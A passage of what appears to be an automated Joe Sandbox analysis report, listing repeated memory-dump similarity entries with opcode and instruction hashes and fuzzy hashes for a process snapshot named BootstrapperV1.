• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1f62afbd2800118bb01044c002b682a6c20573885e3ef2270aa3aa808162b5fe
• Instruction ID: 438035ba9b8f017b531dc8d7be27afe0d7ec87c0c787edd912464ffa67f6167a
• Opcode Fuzzy Hash: 1f62afbd2800118bb01044c002b682a6c20573885e3ef2270aa3aa808162b5fe
• Instruction Fuzzy Hash: 1F910C92A0DAD64FE312BB7CD8999E83FB0EF42256F0841F7C18D871A3DD19240783A5
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f16d0060d67cc719b716bb61ddd4b0334672d93d5d8041d46e25d3c1df33059b
• Instruction ID: 83901651544d5d22a27eeb20dc59628e11e8a4453fd55185b15cf8354f9024af
• Opcode Fuzzy Hash: f16d0060d67cc719b716bb61ddd4b0334672d93d5d8041d46e25d3c1df33059b
• Instruction Fuzzy Hash: DA71E971A1CA488FDB55EF6CD8955A97BE1FFA8711B04017EE54AC7361DD20A802C7C2
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bb0e7cb311968ebd91547eff20a084cb853d418eef8955549773556ed387a16f
• Instruction ID: 72d045a82e5cbf6e2a9e36611928fed54466ea5d3b7e7740504390b795f25cd5
• Opcode Fuzzy Hash: bb0e7cb311968ebd91547eff20a084cb853d418eef8955549773556ed387a16f
• Instruction Fuzzy Hash: 1571E971A1CA488FDB55EF6CD8955A97BE1FFA8711B04017EE58AC7361DE20A802C781
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5b0a1a09ce12f60e500a195ae098d0186956110f9f7d14df47037e00d6555499
                                                                                                                                                                                                                                              • Instruction ID: 0d708cd23aeb711675bf8bd13ad57e3fe9bf18e22887de089218603061961f6e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b0a1a09ce12f60e500a195ae098d0186956110f9f7d14df47037e00d6555499
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F719061B0DB468BE7396E78D9418F177D1EF41312B14C2BEC58B832A7E958BC478382
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: fb9565ad64a83340e50329c006ce722a362b10b27fcaad40f1ba52518d5b0dc5
                                                                                                                                                                                                                                              • Instruction ID: 4fea5de4194584160a06bc92910301d65f55f38cdef25f03ae8a8d47e61654b8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb9565ad64a83340e50329c006ce722a362b10b27fcaad40f1ba52518d5b0dc5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F71DB71A1CA488FDB59EF6CD8955AD7BE1FF68701B04017EE48AD7361DE20E801C782
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3fce9adc0428326505170c88de5d2537b2a07e5009d0076ec2975869142adffd
                                                                                                                                                                                                                                              • Instruction ID: cbf4e9ce2461bf28cf2852a97ea469ebe5741f0a98647e47a549cdb5b9e6d53b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fce9adc0428326505170c88de5d2537b2a07e5009d0076ec2975869142adffd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F881FCA2A0DBD64FE313AB7CD8955E83FB0EF52256F0841F7C1898B1A3DD59240787A1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 82a2c3d6caf0316c39252b240f64bdee83d4970d8b3815ec8bbc56c0f998a7f1
                                                                                                                                                                                                                                              • Instruction ID: f439cc73b2ddd7a68404a2d1466daf2f10f5bcb6478187829ae22b8381e8dd2e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82a2c3d6caf0316c39252b240f64bdee83d4970d8b3815ec8bbc56c0f998a7f1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A271C671A1CA489FDB59EB6CD8955A97BE1FF68701B0401BEE48AD3361DE20AC01C782
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: aa9ed46e8b5b4c9de485d2a41cb39d8dddfc62a6ef690406ea15fc9bf2c56e87
                                                                                                                                                                                                                                              • Instruction ID: f4393a091f66830cd8643b5258198696531ac5b8cd50ea6be54b992bb3be06f2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa9ed46e8b5b4c9de485d2a41cb39d8dddfc62a6ef690406ea15fc9bf2c56e87
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 868127A0B0C60A4BF764BE38C544AB973D1EF45312F04C27AC18EC73E2DDAD6845A391
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f2c25a0e325120e6ce9a7a992882fcf32ed845f4dc35aee679e5eed4674113e4
                                                                                                                                                                                                                                              • Instruction ID: 67b013768075f885c6d747edaef5c990601e97b35e578bafaeba3c8095af8590
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2c25a0e325120e6ce9a7a992882fcf32ed845f4dc35aee679e5eed4674113e4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64713861B0DB894FE765AB3CD8197B57BD1EF9A211F0484FEC08EC72A2DE646846C341
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9f4674342d57010bad71494a86bf2e7e2d17fe1815712cfde3181ef48bc157fe
                                                                                                                                                                                                                                              • Instruction ID: 1e8d7935adec2072e37f7c4d6e7f8ee83594147ad4f7d7d8f03bfd71d131e814
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f4674342d57010bad71494a86bf2e7e2d17fe1815712cfde3181ef48bc157fe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59517CA2B1DE4A4FF7D9EA7CD4D927527D1EF98252B1840BAD54DC33A2ED18DC428340
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 93486aecb5c0a5144a1b8c4b061513808cb5b56500ebf2e0ece3c25f1b1cf912
                                                                                                                                                                                                                                              • Instruction ID: ef3f9daaaf8c10fa597689491cb2d8ff422a78c2651418cb90b9e01fdec42a78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93486aecb5c0a5144a1b8c4b061513808cb5b56500ebf2e0ece3c25f1b1cf912
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E71C2B1A0CA8D8FDB85EF7CC495AE97BF1FF59301B0441B6D448DB2A6DE34A8458740
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Instruction ID: 56b1abc262f97dcd26d283194bc330569eee10cad21c39ea549b32bb3bfcfd26
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46c0dc67ff94f44697f46c6d5c189cb1e261030dd3c5267000f71d6e7157a449
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2841E1B061CA0A5FD769EF38C985A62B7E0FF98305B54467DD58DC3266DA34F8828780
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b48d3c7b66c3e7e81052ec398c9d72f0459a1713f50af7477c64aaaa66b8bc33
                                                                                                                                                                                                                                              • Instruction ID: decbe1b352a4466ad404e3b66548659977512e73a34804766b4477ea46864c41
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b48d3c7b66c3e7e81052ec398c9d72f0459a1713f50af7477c64aaaa66b8bc33
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F14113A1A0D9596FD795FB6C98547BD3BE1EF99321B0881B6E00DC73A6CD189C018381
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: ae90c75912de5ff13f99c4b62bfc5001512a23917135ea87cf2314fdeac5d243
                                                                                                                                                                                                                                              • Instruction ID: 74b9e25e804a715712d4d54a6f3c3891aeb0c3a60da063f465048761daed9f48
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae90c75912de5ff13f99c4b62bfc5001512a23917135ea87cf2314fdeac5d243
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D41FF61B0CE4A1FEBF8EA2C95A4A7077D2EFA821134845FAD54DC72A3DD18EC41C380
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 38ea93b209d264542a5b0ef15cef790950dcd4c754bbbac6dd8e5ff57d5f07c5
                                                                                                                                                                                                                                              • Instruction ID: ab4c423449f2e461c8c40dc88de106b5953faab1d26093323fb01aa011f474bb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38ea93b209d264542a5b0ef15cef790950dcd4c754bbbac6dd8e5ff57d5f07c5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96410871A0D7895FDB569B38C8156A53FF1EF5B221F0942EBD089C72B3DA58AC02C391
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 77559f257f3a2b28ac3ebe66584ce56cc5655061af297cc63578b34fcbc3f8d6
                                                                                                                                                                                                                                              • Instruction ID: 73a311a3a25e4f20bf05c3a610f48db64b18866c0032e411b50f340d2cf2486f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77559f257f3a2b28ac3ebe66584ce56cc5655061af297cc63578b34fcbc3f8d6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A4159A2A0D7965FEB527E7CE4965FC3BA0DF52326B0842F7D18CC62A3DD1858068391
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 313cecf548592c4f6ffbeffc37c9ad4b76fcb50ba90631474c1bfe1d8ab20a0d
                                                                                                                                                                                                                                              • Instruction ID: a42d1cc1bd4ef35b5916343c49b0a30bd06410a1901b1272a9b5db306f64e116
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 313cecf548592c4f6ffbeffc37c9ad4b76fcb50ba90631474c1bfe1d8ab20a0d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46413372A0DA8E5FDB45EF3CC8546E97BE0EF65316F0441BFD149C32A2DA289845C790
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 39ef8a39349c0c7755670034d6ceb5f6c391baec864be9d8a96cd9ad71373701
                                                                                                                                                                                                                                              • Instruction ID: 7f0eb919fb64002e8f35ec0360848b9bf83f0c64637a2abf6b944c2154a16439
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39ef8a39349c0c7755670034d6ceb5f6c391baec864be9d8a96cd9ad71373701
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8041E170A1CE064FE758EA38D495AA9B7D2FF84301F04857DD58AC32A5DE29F842C780
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 542d07fe7933d900dd86b909a80b93b556633aaa83e8152f308f53b0ab6e1769
                                                                                                                                                                                                                                              • Instruction ID: ba55234b0759b2cca7668dff08bd3cc04ad1d459e5648b03da17bf63dc4863e4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 542d07fe7933d900dd86b909a80b93b556633aaa83e8152f308f53b0ab6e1769
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53312C72A1C94A4FF794AE3CD8993B937D0EB98311F0445BFE84DC73A1EE1899864781
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
• Opcode ID: 41280a6bb45588fede8b6ca4236c822a6f4a8fb6d68ef1642c9d562810d3d298
• Instruction ID: 5dfaecec6942e5b69dc2fa8bdb0a10121724081afb6744b3827ef81576a82641
• Opcode Fuzzy Hash: 41280a6bb45588fede8b6ca4236c822a6f4a8fb6d68ef1642c9d562810d3d298
• Instruction Fuzzy Hash: 4F41069290D6CA6FE742BBB8A8665E97FB0DF03255F0842FAD4CD8B193DC0824468756

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb914407a66afee486787d3dfdc7ed5b100fd0e34cd4c3c41835aef784608014
• Instruction ID: dc509c006dd581b9c55b6f7a6b32c271ebce4764dec024a4f7ec1b7c0441522a
• Opcode Fuzzy Hash: eb914407a66afee486787d3dfdc7ed5b100fd0e34cd4c3c41835aef784608014
• Instruction Fuzzy Hash: F341DF7071CA458FD759EF38C594AB977E1FF49301F1480BDD18AC72A2CE69B8468742

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 44a875bee678f4dfe32f37a48d2d628aa9d410e42e33b5b479a6f87cc01a0ef0
• Instruction ID: 35d2b1951f99dcadf17f39e63bb302b9de7624a388ece533dee9c9988af5cbae
• Opcode Fuzzy Hash: 44a875bee678f4dfe32f37a48d2d628aa9d410e42e33b5b479a6f87cc01a0ef0
• Instruction Fuzzy Hash: 9A31F192B0DAC50FE3D5EBBC68A55A87FC1EF9A11574940FAD988C72B3D8445806C381

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6fb13f9eb0cd7541eccd5fd902ca2ded2abf65b111092ccb00d59a63f7063079
• Instruction ID: 4dfbf4382fb6c6d0053cb286c7772690c92ae7e6c1df292f8616fdc7a3c9b696
• Opcode Fuzzy Hash: 6fb13f9eb0cd7541eccd5fd902ca2ded2abf65b111092ccb00d59a63f7063079
• Instruction Fuzzy Hash: A931D160B1D94D0FEAD9EA3CD459675BBC2EF98311B1405BED48EC33A7DD18AC428740

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 93b030ff01ebec272a4ed5ae76d3753f79a62fd56f1388e5e68c0472578d97fe
• Instruction ID: 93ee8f44ced5253294761bc70a10b904a5de8c581903b12eee9dab0a650e8ecb
• Opcode Fuzzy Hash: 93b030ff01ebec272a4ed5ae76d3753f79a62fd56f1388e5e68c0472578d97fe
• Instruction Fuzzy Hash: B6313966A0E7954FD3136B3CE8E64E53BB0DF4322671942FBD089CE1A3DC09884B8356

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1cd23a8ec65d53832b995a8817abb87a289f7b884655ee475b5a5ba59a4fe234
• Instruction ID: 7d80aa78898aa205d04d10022a8ed12073f4d96b6c150050bcf604650ed90555
• Opcode Fuzzy Hash: 1cd23a8ec65d53832b995a8817abb87a289f7b884655ee475b5a5ba59a4fe234
• Instruction Fuzzy Hash: 373107A170C9895FEB90FB3CD5596B47BE1FF5931670800FAD48CC7267D9159C428340

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c7b4c2f230dfdbc49c52636aa83846c815b70af9fbd40fbbea918b8ee10a1228
• Instruction ID: e47e61f28d051484335b842cee95b90ded00a42a3eca27fa97b2d542979273e6
• Opcode Fuzzy Hash: c7b4c2f230dfdbc49c52636aa83846c815b70af9fbd40fbbea918b8ee10a1228
• Instruction Fuzzy Hash: E741129048F7C22FD79397B899655923FF99E87120B0E81EBD5C8CE0A7D54E085AC322

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fb85350fd9e27d12814f9fb13cf33b1d2b7908067d72c3a09280c22f77805c07
• Instruction ID: 970ce0ef45247437e58f51691be3e737757bbb94b87ebb14d586e79f439f2138
• Opcode Fuzzy Hash: fb85350fd9e27d12814f9fb13cf33b1d2b7908067d72c3a09280c22f77805c07
• Instruction Fuzzy Hash: 7B3124A1A0E6C52FE717E77899A65B57FE1EF57200B0844FED4C9CB1A3EC0858428351

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: efbc9925c724591282adb46826623ff679af0e589df0d637e74b02db1b433918
• Instruction ID: 09b0e12196c1c83bc79d18bf8c125fbda3bebb04372836723a2472af024c1a74
• Opcode Fuzzy Hash: efbc9925c724591282adb46826623ff679af0e589df0d637e74b02db1b433918
• Instruction Fuzzy Hash: 37317E7071CA098BD768EE2CC584AB973E1FB98302F64857DD55FC33A1CE65B8468781

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3df4796f17a67b4a1b8ca5b89423c44cbe43d27f3b4fb5a4d275cff605ca65ac
• Instruction ID: 0f3500f596b283bc2f60c52377406bbf8e0706c2f0b4b749e798e6072d662c8f
• Opcode Fuzzy Hash: 3df4796f17a67b4a1b8ca5b89423c44cbe43d27f3b4fb5a4d275cff605ca65ac
• Instruction Fuzzy Hash: 6731D4A160C9C95FEB91FB3C95596643BE2FF5D356B0900FAD48CC72A3D9199C028340

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 77cb8c3ed181367ab8c02f3fc44163f5245be4a6eaf0978e260595a02499a0b8
• Instruction ID: fd8a1bfed5e864d6fb74ff204ca585d3ca62fa3a27c8557643036ebf3c9f3861
• Opcode Fuzzy Hash: 77cb8c3ed181367ab8c02f3fc44163f5245be4a6eaf0978e260595a02499a0b8
• Instruction Fuzzy Hash: 4441F36160EBC98FC756EF38C8A49A1BFE0EF5621530982EAD089CF1B3D915E806C710
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f1f659595460ba86be8dc1a6bc846991faa5147837a1938cbc0a60392457fd60
                                                                                                                                                                                                                                              • Instruction ID: 665147cb3a4509e363180a6b62eb89c8f3f103a43333aa0aefd47d8cc3f9c971
